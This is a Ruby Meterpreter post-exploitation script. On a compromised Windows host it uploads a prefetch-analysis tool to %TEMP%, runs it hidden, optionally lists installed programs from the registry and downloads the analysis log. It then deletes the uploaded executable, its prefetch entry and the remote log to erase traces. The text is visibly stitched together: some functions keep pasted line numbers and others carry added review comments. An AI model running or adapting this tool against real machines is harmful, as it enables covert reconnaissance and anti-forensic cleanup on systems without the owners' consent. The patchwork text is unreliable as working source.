milo

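#!/usr/bin/env ruby
# Meterpreter script for extracting information from the Windows prefetch folder
# Provided by Milo at keith.lee2012[at]gmail.com
# Version: 0.1.0
#
# Top-level setup shared by the helper methods and the MAIN section below:
# the Meterpreter session, the option parser, the remote %TEMP% path and the
# random basename used for the remote analysis log.
# (Unused locals `runTop` and `logs` from the original setup were dropped;
# nothing in the script reads them.)
session = client
# tunnel_peer is "host:port"; only host is of interest, and prefetchdump
# re-derives it anyway, so this is informational only.
host, _port = session.tunnel_peer.split(':')

# Script Options: flag => [takes_an_argument, description]
exec_opts = Rex::Parser::Arguments.new(
  "-h" => [false, "Help menu."],
  "-p" => [false, "List Installed Programs"],
  "-c" => [false, "Disable SHA1/MD5 checksum"],
  "-x" => [true,  "Top x Accessed Executables (Based on Prefetch folder)"],
  "-d" => [false, "Disable lookup for software name"],
  "-l" => [false, "Download Prefetch Folder Analysis Log"]
)
# Remote temp directory, expanded on the target.
tmp = session.fs.file.expand_path("%TEMP%")
# Five-digit, zero-padded random basename for the remote log file.
imgname = format("%.5d", rand(100000))
# Filled in by the -l option in MAIN (" --txt=<tmp>\<imgname>"); "" means no log requested.
logs1 = ''

# Assigned to session.response_timeout while the prefetch tool runs.
timeoutsec = 1000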
  24. #---------------------------------------------------------------------------------------------------------
  25. def readprogramlist(session)
  26.         begin
  27.         key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
  28.         sfmsvals = key.enum_key
  29.         sfmsvals.each do |test1|
  30.                 begin                  
  31.                         key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
  32.                         root_key2, base_key2 = session.sys.registry.splitkey(key2)
  33.                         value1 = "DisplayName"
  34.                         value2 = "DisplayVersion"
  35.                         open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
  36.                         v1 = open_key.query_value(value1)
  37.                         v2 = open_key.query_value(value2)
  38.                         print_status("#{v1.data}\t(Version:  #{v2.data})")
  39.                 rescue
  40.                 end
  41.         end
  42.         end
  43. end
  44.  
# Upload the bundled prefetch.exe analysis tool to the target's %TEMP%, run it
# with the collected switches, wait for it to exit, then delete the uploaded
# executable and the .pf entry Windows created for it.
#
# @param session    [Object]  Meterpreter client session
# @param tmp        [String]  remote %TEMP% path (from session.fs.file.expand_path)
# @param imgname    [String]  random basename of the remote log; only used in the status line here
# @param options    [String]  switches forwarded to prefetch.exe (e.g. " --x=5 --disable-lookup")
# @param logs1      [String]  " --txt=<tmp>\<imgname>" when -l was given, "" otherwise
# @param timeoutsec [Integer] value assigned to session.response_timeout before the tool runs
# @return [String, nil] local log directory created for this host, or nil when
#   logs1 is empty (`logs` is only assigned inside that branch; MAIN only uses
#   the return value when -l was given)
def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
        tmpout = []   # unused
        # prefetch.exe is expected to ship in the framework's data directory.
        prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
        # Random basename for the remote copy of the tool.
        prefetchlog = sprintf("%.5d",rand(100000))
        print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
        begin
                session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
                print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
        rescue::Exception => e
                        # NOTE(review): rescues ::Exception (also Interrupt/SystemExit); StandardError
                        # is the conventional choice. Execution continues even if the upload failed.
                        print_status("The following Error was encountered: #{e.class} #{e}")
        end
        session.response_timeout=timeoutsec
        if logs1!=''
                # Re-derive the session and peer host; host names the local log directory.
                session = client
                host,port = session.tunnel_peer.split(':')
                # Local directory: <config_directory>/logs/prefetch/<host>-<timestamp>.
                # NOTE(review): the format is %Y%m%d.%M%S (minute, second) with no hour
                # field; presumably "%Y%m%d.%H%M%S" was intended — confirm.
                logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
                ::FileUtils.mkdir_p(logs)
                # This prints the remote path; the local directory is `logs`.
                print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
        end

        begin
                # Run the tool through cmd.exe; the channelized handle streams its stdout.
                # NOTE(review): when logs1 is "" the command line still ends in a bare
                # " .txt" argument — confirm prefetch.exe tolerates it.
                r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
                while(d = r.channel.read)
                        print_status d
                end
                sleep(2)
                # Poll the process list until no process named <prefetchlog>.exe remains:
                # each pass sets found=1, and a match resets it to 0 and sleeps.
                # NOTE(review): an empty process list would leave found at 0 forever.
                prog2check = "#{prefetchlog}.exe"
                found = 0
                while found == 0
                        session.sys.process.get_processes().each do |x|
                                found =1
                                if prog2check == (x['name'].downcase)
                                        print "."
                                        sleep(0.5)
                                        found = 0
                                end
                        end
                end
                r.channel.close
                r.close
                print "\n"
                if logs1!=""
                        print_status("Finish extracting prefetch folder data")
                end
                # Cleanup on the target: remove the uploaded tool and its .pf entry.
                # The text log written with -l stays in %TEMP% until logdown fetches it.
                print_status("Deleting #{prefetchlog}.exe from target...")
                session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
                session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
                print_status("Clearing prefetch-tool prefetch entry ...")
        rescue::Exception => e
                        # NOTE(review): same ::Exception concern as above.
                        print_status("The following error was encountered: #{e.class} #{e}")
        end
        return logs
end
  98. #---------------------------------------------------------------------------------------------------------
  99. def logdown(session,tmp,imgname,logs,timeoutsec)
  100.         session.response_timeout=timeoutsec
  101.         print_status("Downloading prefetch-tool logs to #{logs}")
  102.         begin
  103.                 session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
  104.                 print_status("Finished downloading prefetch-tool log")
  105.                 print_status("Deleting left over files...")
  106.                 session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
  107.                 print_status("Prefetch-tool log on target deleted")
  108.         rescue::Exception => e
  109.                         print_status("The following Error was encountered: #{e.class} #{e}")
  110.         end
  111. end
  112.  
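################## MAIN ##################
# Parsing of Option
# Flags are 0/1 integers, following the original script's convention.
# (The original also set `checksum` and `inetlookup`, which nothing read; -c
# and -d only append switches to options1.)
hlp = 0            # 1 => help shown or -p given; the prefetch tool is not run
dwld = 0           # 1 => download the analysis log afterwards (-l)
options1 = ""      # switches forwarded to prefetch.exe
viewPrograms = 0   # 1 => list installed programs (-p)

exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-x"
    options1 += " --x=#{val}"
  when "-c"
    options1 += " --disable-md5 --disable-sha1"
  when "-p"
    viewPrograms = 1
    hlp = 1
  when "-d"
    options1 += " --disable-lookup"
  when "-l"
    # Ask the tool to write its text log to <tmp>\<imgname>.txt; logdown fetches it later.
    # logs1 is the top-level local, so this assignment is visible after the block.
    logs1 = " --txt=#{tmp}\\#{imgname}"
    dwld = 1
  when "-h"
    hlp = 1
    # Bug fix: the original referenced `@@exec_opts`, a class variable never
    # defined in this script; the parser is the top-level local `exec_opts`.
    print("Prefetch-tool Meterpreter Script\n" + exec_opts.usage)
    break
  end
end

readprogramlist(session) if viewPrograms == 1

if hlp == 0
  print_status("Running Prefetch-tool Script.....")
  # logs2 is the local log directory (nil unless -l was given; only used when dwld == 1).
  logs2 = prefetchdump(session, tmp, imgname, options1, logs1, timeoutsec)
  logdown(session, tmp, imgname, logs2, timeoutsec) if dwld == 1
end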